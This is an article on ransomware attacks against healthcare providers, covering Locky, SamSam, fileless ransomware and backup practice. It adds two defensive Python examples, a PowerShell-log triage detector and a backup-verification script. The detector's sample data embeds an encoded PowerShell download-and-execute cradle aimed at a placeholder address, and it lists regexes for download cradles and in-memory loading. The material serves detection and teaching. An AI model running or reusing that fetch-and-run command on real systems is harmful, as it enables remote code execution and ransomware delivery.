Over the past two years, ransomware has grown into one of the biggest cybersecurity threats. While most infections are opportunistic rather than targeted, the healthcare industry was singled out in 2016, and the outlook for 2017 remains bleak.
Many healthcare organizations attacked with ransomware have made a full recovery by wiping the affected systems and restoring data from backups. However, there have been numerous cases over the past 12 months in which restoration from backups failed. In such cases, healthcare organizations face two options: accept the data loss, or pay the attackers for the keys needed to decrypt the files. In February 2016, Hollywood Presbyterian Medical Center chose the latter and paid the attackers $17,000 for the decryption keys.
2016 saw major new ransomware variants unleashed, with Locky and Samas (SamSam) two of the biggest threats. Both were used against healthcare providers in 2016: Locky was reportedly used in the HPMC attack, and Samas was reportedly used in a major attack on MedStar Health in March 2016.
In October last year, MalwareHunterTeam reported that there are more than 200 distinct ransomware families, each with a myriad of variants. In 2016, ransomware revenue surpassed the $1 billion milestone.
Ransomware variants are becoming much more sophisticated and use a wide variety of obfuscation techniques to evade detection. They are also spreading more aggressively.
One of the latest developments is fileless ransomware. As CrowdStrike explains, with fileless ransomware “malicious code is either embedded in a native scripting language or written straight into memory using legitimate administrative tools such as PowerShell, without being written to disk.” Since no malicious file lands on the victim’s disk, traditional signature-based detection, which scans files, fails to identify the threat. What remains observable is the behaviour of the legitimate tool being abused, for example the script text that PowerShell actually executes, so detection has to move from what is written to disk to what is logged and executed in memory.
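To make the last point concrete, the following is an added example (not from the article or from CrowdStrike) of the kind of behavioural triage that still works when nothing is written to disk. It runs over a handful of constructed records loosely modelled on PowerShell script block logging (Event ID 4104); the hostnames, URL and script text are made up, and the indicator list is illustrative, not exhaustive. The point it shows is that an `-EncodedCommand` payload has to be decoded (base64 of UTF-16LE) before the download cradle inside it becomes visible.

```python
import base64
import re
from typing import Dict, List

# Constructed sample records, loosely modelled on PowerShell script block
# logging (Event ID 4104). Real events carry many more fields; only the
# recorded script text is used here. Hostnames and the URL are made up.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
    .encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws-nurse-07", "script": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"host": "ws-nurse-07",
     "script": f"powershell.exe -nop -w hidden -EncodedCommand {_ENCODED_PAYLOAD}"},
    {"host": "ws-admin-02",
     "script": "$asm = [System.Reflection.Assembly]::Load($bytes); Invoke-Expression $entry"},
    {"host": "ws-admin-02", "script": "Get-Service | Where-Object Status -eq Running"},
]

# Behavioural indicators of in-memory execution. PowerShell accepts any
# unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), hence -e[a-z]*.
INDICATORS = {
    "encoded_command": re.compile(r"-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I),
}

_ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(script: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none."""
    m = _ENC_RE.search(script)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse_event(event: Dict[str, str]) -> Dict[str, object]:
    """Match indicators against the logged script text and any decoded payload."""
    decoded = decode_encoded_command(event["script"])
    text = event["script"] + "\n" + decoded  # scan the outer command and the inner payload
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"host": event["host"], "indicators": hits, "decoded": decoded}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return analyses for events matching at least one indicator, most hits first."""
    flagged = [a for a in (analyse_event(e) for e in events) if a["indicators"]]
    return sorted(flagged, key=lambda a: -len(a["indicators"]))


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["indicators"])
        if hit["decoded"]:
            print("  decoded payload:", hit["decoded"])
```

The two benign administrative commands produce no hits; the encoded one is flagged four times only because the payload was decoded first. Without script block logging (or an equivalent source such as AMSI or a transcription log) none of this text exists to be inspected, so enabling that logging is a prerequisite for detecting fileless ransomware at all.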
Infographic Source: Crowdstrike
The fight against ransomware requires multilayered defenses and a range of technologies to prevent infection. Healthcare employees should be warned of the threat, and ransomware should be covered in security awareness training. Basic security awareness can prevent some infections: simple measures such as verifying the source of an email before clicking a link, and never opening attachments from unknown senders, should be practiced by all employees.
However, even with advanced ransomware defenses, organizations should be prepared to deal with an attack that gets through. In addition to detection technologies, policies and procedures should be written specifically for ransomware infections to ensure the fastest possible response. Rapid detection is essential if damage is to be limited.
There have been numerous cases in which data were encrypted, yet the attackers were unable to supply working keys. Paying a ransom is therefore no guarantee that files can be unlocked; recovery will hinge on whether files can be restored from backups.
To limit data loss, daily backups are essential, stored securely both in the cloud and on air-gapped backup drives. A synced cloud folder, however, is not a backup: a sync client mirrors whatever is on the local disk, encrypted files included. As was demonstrated this week, cloud copies of files can be encrypted just as easily. A nursing school in California, The Gurnick Academy, suffered a ransomware infection when an instructor inadvertently introduced ransomware via a USB drive. Because Google Drive sync was running on his computer, the encrypted files were replicated to his Google Drive account.
When it comes to backups, organizations should follow the 3-2-1 rule: keep three copies of the data, on two different types of media, with one copy stored in a secure, off-site location. Backups should also be test-restored regularly, since the cases above show that a backup which has never been restored is only assumed to work.
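The failed restores and the replicated-encryption case above share one cause: nobody checked the backup copy against what was backed up. The following is an added example (not from the article or from any of the organizations it names) of a minimal backup verification routine: record a SHA-256 manifest when the backup is taken, then compare a restored copy against it and flag files whose contents look like ciphertext. The scenario it runs is constructed in a temporary directory; the file names, contents and the `.locked` extension are made up, and the entropy threshold is a heuristic, not a standard.

```python
import hashlib
import math
import os
import shutil
import tempfile
from collections import Counter
from pathlib import Path
from typing import Dict, List

# Files whose byte distribution is this close to uniform (max 8.0 bits/byte)
# are treated as possibly encrypted. Compressed media (zip, jpg, pdf) also
# score high, so in practice this is paired with an extension allow-list.
ENTROPY_THRESHOLD = 7.2


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, 0.0 for empty or single-valued input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_manifest(root: Path) -> Dict[str, str]:
    """Relative path -> SHA-256 for every regular file under root, taken at backup time."""
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_backup(manifest: Dict[str, str], restored: Path) -> Dict[str, List[str]]:
    """Compare a restored tree against the manifest recorded when the backup was taken."""
    report: Dict[str, List[str]] = {
        "ok": [], "missing": [], "mismatched": [], "unexpected": [], "high_entropy": []}
    present = {str(p.relative_to(restored)): p for p in restored.rglob("*") if p.is_file()}
    for rel, digest in manifest.items():
        if rel not in present:
            report["missing"].append(rel)          # deleted or renamed by ransomware
        elif sha256_file(present[rel]) != digest:
            report["mismatched"].append(rel)       # overwritten in place
        else:
            report["ok"].append(rel)
    for rel, p in present.items():
        if rel not in manifest:
            report["unexpected"].append(rel)       # e.g. renamed with a ransom extension
        # Only the first 64 KiB is sampled; encryption changes the file from the start.
        if shannon_entropy(p.read_bytes()[:65536]) > ENTROPY_THRESHOLD:
            report["high_entropy"].append(rel)
    for key in report:
        report[key].sort()
    return report


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: take a backup, let simulated ransomware hit the copy, verify."""
    with tempfile.TemporaryDirectory() as tmp:
        source, backup = Path(tmp) / "source", Path(tmp) / "backup"
        source.mkdir()
        (source / "schedule.csv").write_text("date,room,patient_id\n" + "2016-03-01,4B,0001\n" * 40)
        (source / "notes.txt").write_text("Shift handover notes\n" * 100)
        (source / "policy.txt").write_text("Backup policy: 3-2-1\n" * 50)

        manifest = build_manifest(source)  # recorded when the backup is taken
        shutil.copytree(source, backup)    # the backup copy (or a synced cloud folder)

        # Simulated ransomware on the copy: one file overwritten in place with
        # ciphertext-like random bytes, one renamed and encrypted, one untouched.
        (backup / "schedule.csv").write_bytes(os.urandom(4096))
        (backup / "notes.txt").rename(backup / "notes.txt.locked")
        (backup / "notes.txt.locked").write_bytes(os.urandom(4096))

        return verify_backup(manifest, backup)


if __name__ == "__main__":
    for key, files in demo().items():
        print(f"{key:13s} {files}")
```

Only `policy.txt` verifies cleanly; the overwritten file shows up as a hash mismatch with high entropy, and the renamed file shows up as one missing manifest entry plus one unexpected high-entropy file. The manifest itself should live with the off-site copy of the 3-2-1 set, since a manifest sitting next to the backup can be encrypted with it.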